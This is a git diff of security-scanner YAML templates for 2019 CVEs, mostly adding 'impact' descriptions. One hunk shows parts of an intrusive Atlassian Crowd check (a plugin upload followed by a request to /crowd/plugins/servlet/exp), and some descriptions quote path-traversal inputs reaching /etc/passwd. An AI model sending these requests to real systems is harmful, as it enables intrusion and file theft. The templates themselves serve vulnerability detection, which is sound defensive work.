@@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index f085023463..9491d0b51f 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). reference: diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 2fcba58790..6a3816467a 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 30263c022b..dc4d3c9354 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 06306fa9b7..c7af1618ec 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further exploitation of the system. remediation: | Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability. reference: 
diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 4d25d54ad7..ee91b39e26 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. + impact: | + An attacker can exploit this vulnerability to gather sensitive information, potentially leading to further attacks. remediation: | Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access. reference: diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 3f3f3a5e34..17916b58ef 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 0bfb26a9e5..0cd8765574 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml 
@@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access. + impact: | + An attacker can access sensitive information stored on the system, potentially leading to further compromise. remediation: | Apply the latest security patches and updates provided by Pulse Secure. reference: diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 2bb1ce5c5a..a538318edd 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system. remediation: | Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability. reference: 
@@ -16,15 +18,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* epss-score: 0.97491 + cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: atlassian product: crowd shodan-query: http.component:"Atlassian Jira" - vendor: atlassian tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth - variables: plugin: '{{hex_decode("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")}}' @@ -43,7 +44,6 @@ http: {{plugin}} ------------------------------f15fe87e95a7-- - - | GET /crowd/plugins/servlet/exp HTTP/2 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index ad17c123a8..1bbd98544f 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the necessary security patches or upgrade to a fixed version provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index f0358593b5..395dec99ba 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml 
@@ -11,6 +11,8 @@ info: request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index e9388e9aa5..16567490cc 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -6,6 +6,8 @@ info: severity: high description: | GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system. remediation: | A patch for this issue was made on 2019-05-30 in GrandNode 4.40. reference: diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index e4ef3c672d..85458afcb8 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Deltek Maconomy 2.2.5. reference: diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index ecc8cf947c..fd52d79be2 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 9b62c22086..212f84de3e 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml 
@@ -5,6 +5,8 @@ info: author: n-thumann severity: medium description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 9d7be50111..6de3c343f8 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -5,6 +5,8 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. remediation: | Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 7d533a5ce3..45eb5627d0 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9496094768..7b7792e24a 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -5,6 +5,8 @@ info: author: Mohammedsaneem,philippedelteil,daffainfo severity: medium description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. + impact: | + An attacker can trick an authenticated user into performing unintended actions on the phpMyAdmin application. remediation: | Upgrade phpMyAdmin to version 4.9.0 or later to mitigate the CSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 1062b6c543..b6173b8584 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0,akincibor severity: critical description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. reference: - https://www.zeroshell.org/new-release-and-critical-vulnerability/ diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 2f20b07f6f..2a9ba4272b 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 595eda0c20..ff411909b1 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 80ce6d9686..261163962f 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: 
diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index f4e5bf51d2..dc71e61fd3 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 3173a84b99..91b2f25c54 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service. remediation: | Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index e1320b131b..e6a6821102 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -5,6 +5,8 @@ info: author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. + impact: | + An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router's firmware to the latest version provided by D-Link. reference: diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 6229325043..0a86dc4b2a 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of MindPalette NateMail to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index b45ac3d19e..fb7136e135 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko,daffainfo severity: medium description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index 89e857eafb..bbfc4b26a4 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -5,6 +5,8 @@ info: author: divya_mudgal severity: critical description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system. remediation: | Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability. reference: 
diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 44433a33dc..7a7be5c6a2 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution. remediation: | Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 6f471e91bd..e084c0e377 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 84084bb455..6f9a5d7e5f 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. reference: diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 2519d4664e..6c3a6deceb 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade to a patched version of Aptana Jaxer or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index a5f4d4638e..ce5c79420f 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 82a10a2b30..621ac756f0 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index f66e9b2ac8..49c74f6a30 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index c39c1764c0..581a8e2624 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 6c01822562..2595e52fef 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 7448d4f86b..6bfaac02a3 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index d5dfdc8a1b..87e6bd4468 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise. reference: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index fcbf92d097..97cdaded7a 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: Upgrade to 6.3.4 or higher. reference: - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 20e7935d3d..d17cbc430b 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -5,6 +5,8 @@ info: author: bp0lr severity: critical description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with root privileges. remediation: | Upgrade to Webmin version 1.930 or later to mitigate this vulnerability. reference: 
